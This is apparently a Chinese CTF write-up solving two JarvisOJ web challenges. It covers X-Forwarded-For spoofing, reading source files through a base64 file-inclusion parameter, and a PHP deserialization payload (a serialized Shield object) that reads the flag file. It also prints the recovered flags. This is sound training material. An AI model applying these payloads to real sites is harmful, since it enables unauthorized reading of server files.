[JarvisOj]Web

LOCALHOST

题目入口：http://web.jarvisoj.com:32774/

• X-Forwarded-For Header插件修改IP

  
  

• 刷新

  
  

• PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}

神盾局的秘密

这里有个通向神盾局内部网络的秘密入口，你能通过漏洞发现神盾局的秘密吗？
题目入口：http://web.jarvisoj.com:32768/

主页

• view source
  <img src="[showimg.php?img=c2hpZWxkLmpwZw==]

• 打开
  http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLmpwZw==
  

  一堆乱码

• 分析: 从url可以发现，这是一个文件包含漏洞，而且文件名是base64加密的。
  原生：img=c2hpZWxkLmpwZw==
  解密：img=shield.jpg

• 文件包含漏洞利用

1. 查看showimg.php源码
   view-source: http://web.jarvisoj.com:32768/showimg.php?img=c2hvd2ltZy5waHA=
   

1. 要decode base64。
2. stripos() 返回字符串在另一字符串中第一次出现的位置，如果没有找到字符串则返回 FALSE。
3...,/,\\,pctf,这些字符不能出现在img参数里

2. 查看index.php源码
   view-source: http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw
   

1. 可以传递class参数
2. 反序列化传递的class参数

• require_once()语句在脚本执行期间包含并运行指定文件(通俗一点，括号内的文件会执行一遍)。
• serialize和unserialize函数
  序列化是将变量转换为可保存或传输的字符串的过程；反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来，可以轻松地存储和传输数据。

3. 利用文件包含漏洞，查看shield.php源码
   view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLnBocA==
   

• 打开pctf.php
  http://web.jarvisoj.com:32768/pctf.php
  FLAG: PCTF{I_4m_not_fl4g}
• I_4m_not_fl4g，这不是flag，很遗憾。回到考点：文件包含漏洞，继续查看pctf.php的源码。
  view-source:http://web.jarvisoj.com:32768/showimg.php?img=cGN0Zi5waHA=
  File not found!
• 审计showimg.php源码发现：不能出现pctf字符
  -->不能用showimg.php来读取pctf.php了
  -->利用index.php来读取pctf.php，构造序列化参数class，反序列化class参数来new（实例化）Shield对象，再调用shield对象的readfile方法。
  -->index.php 里的意思是对Shield('$class')反序列化了，所以我们要序列化Shield('pctf.php')，得到的参数才传入class中。
• 写个php脚本，用warmpserver搭建服务打开网址

<?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }
        
        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
    $x=new Shield('pctf.php');
    echo serialize($x);
?>

• 得到序列化Shield('pctf.php')参数
  O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
• view-source:http://web.jarvisoj.com:32768/index.php/?class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
  
• PCTF{W3lcome_To_Shi3ld_secret_Ar3a}